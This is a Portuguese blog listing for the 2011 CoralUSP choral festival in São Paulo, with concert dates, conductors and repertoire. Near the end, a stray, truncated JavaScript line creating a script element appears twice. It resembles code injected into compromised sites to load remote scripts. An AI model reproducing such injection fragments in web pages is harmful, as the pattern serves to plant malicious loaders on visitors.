Música coralProgramaçãoSão Paulo

Festival CORALUSP 2011

De 07 a 11 de junho acontece a 6a. edição do Festival CoralUSP, sempre às 20h30, no Anfiteatro Camargo Guarnieri Será apresentado ao público um panorama artístico desenvolvido pelos 12 grupos que atualmente compõem o CoralUSP. A programação é composta por palestra (em horários especiais) e concertos do CoralUSP, sob o comando de seus regentes e com a participação especial de outros grupos vocais como Coral Unifesp, Madrigal Cantabilis.

PALESTRAS

Dias 09 e 10 de junho, das 17 às 18h30 “História da MPB: do gramofone ao MP3”

Ministrada por: Eduardo Fernandes

 

CONCERTOS

De 7 a 11 de junho

Anfiteatro Camargo Guarnieri

 

AS SINOPSES

– Dia 07 de junho, terça-feira, 20h30

CoralUSP Estação Ciência  e CoralUSP Casa de Dona Yayá

Regência: Mauro Aulicino

Coral ECA/USP, a confirmar

CoralUSP – Casa de Dona Yayá – Regência: Mauro Aulicino

“No Tabuleiro de Dorival… Samba, Canção e Madrigal” – Canções da Bahia, do Brasil e do Renascimento Europeu

Peças de destaque: Maracangalha de Dorival Caymmi, Arr: Gabriel Levy; Tourdion, Anônimo; A Lenda, do Abaeté de Dorival Caymmi, Arr: Teco Galati; Weep, O Mine Eyes de John Bennet.

 

CoralUSP – Estação Ciência – Regência: Mauro Aulicino

“Nega Música” – O Ganzá Chacoalha As Vozes Do Brasil

Peças de destaque: Conto de Areia, de Romildo Bastos e Toninho Nascimento, Arr: Mauro Aulicino; YáYá Massemba, de Roberto Mendes e Capinam, Arr: Charles Raszl; Ganga – Zumbi de Sérgio Santos e Paulo César Pinheiro, Arr: Mauro Aulicino; Ijexá A Oxum de domínio público,

Arr: Ricardo Barison.

 

– Dia 08 de junho, quarta-feira, 20h30

CoralUSP – XI de Agosto – Regência: Eduardo Fernandes CoralUSP – Regência: André Juarez

“Samba no coro” – O projeto Samba no Coro apresenta um repertório de sambas de vários estilos (afro-samba, samba de breque, partido alto, bossa-nova, choro, etc…) com arranjos para coro misto a 4 vozes ( à capela ou com acompanhamento instrumental).

Peças de destaque: Isaura Herivelto Martins,  Arr. Rogério Duprat; Berimbau, Vinícius de Morais & Baden Powell; Eu sei que vou te amar, Vinícius de Morais; Tourdion, anônimo séc. XVI.

 

CORALUSP – XI de Agosto – Regência: Eduardo Fernandes

“O Rock como expressão de rebeldia na segunda metade do século XX”

O programa busca ser o mais abrangente possível, contemplando canções de várias épocas e diferentes nacionalidades.  Dentro deste espírito destacam-se, entre outras: Somebody to Love – Queen;  With a little help from my friends – Beatles; Pro dia nascer feliz – Cazuza e Frejat. O grupo, criado no início deste ano, tem como objetivo o desenvolvimento de um repertório eclético, a fim de que seus cantores possam vivenciar diferentes tipos de repertório Coral.

Neste sentido destacam-se as músicas: Freedom is coming – canção tradicional Sul Africana; Tempos modernos – Lulu Santos;  Cómo pájaros em el aire- Peteco Carabajal (Argentina).

 

– Dia 09 de junho, quinta-feira, 20h30

CoralUSP – Regência: Paula Christina Monteiro

“O Mundo em Vozes – Vozes de Todo Mundo e do Mundo Todo” – Um repertório eclético, com obras de várias épocas e diferentes países, mesclando peças sacras e profanas, populares, folclóricas e eruditas, a capela ou acompanhadas por piano.

Algumas peças que farão parte do programa: Missa Brevis de Palestrina, Muié Rendera, com arranjo de Carlos Alberto da Fonseca, Sambas de Lupicínio Rodrigues, com arranjo de Damiano Cozzella

 

CoralUSP – Regência: Alberto Cunha

“Música Ibérica”: peças folclóricas, populares e eruditas de Portugal e Espanha.

Destaque para “3 Epitáfios”, de Rodolfo Halffter, “Llevame niño pal cura”, de Jose Maria Cano, e “Pois sois mãe da flor do campo”, de autor anônimo portugues do sec. 17.

 

– Dia 10 de junho, sexta-feira, 20h30

CoralUSP – Regência: Marcia Hentschel

Repertório a ser divulgado

Coral UNIFESP – Regência: Eduardo Fernandes

“A Noiva do Condutor” – Opereta radiofônica: de Noel Rosa e Arnold Gluckmann Com humor e fina ironia, características fundamentais de toda a sua obra, Noel cria uma opereta tipicamente carioca onde os valores mudam a todo instante, de acordo com a conveniência do momento.

Com destaque para as peças: Com que Roupa e  Conversa de Botequim que tem arranjos de Damiano Cozzella

 

– Dia 11 de junho, sábado, 18h.

trimix CoralUSP – Grupo Jupará – Regência: Alberto Cunha “Vertentes da Música Sacra” com peças de diferentes estilos e periodos históricos.

Destacando “Pater Noster” de Franz Liszt (homenagem aos 200 anos de nascimento do compositor), “Qui tollis”, da Missa em si menor de Johann S. Bach e “Cantate Domino”, de Claudio Monteverdi.

 

Madrigal Cantabilis – Regência: Jan Szot O grupo apresentará alguns trechos encenados e caracterizados da Ópera O Elixir do Amor L’elisir D’amore (Gaetano Donizetti)

 var d=document;var s=d.createElement(‘script’); var d=document;var s=d.createElement(‘script’);

Leave a Response

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.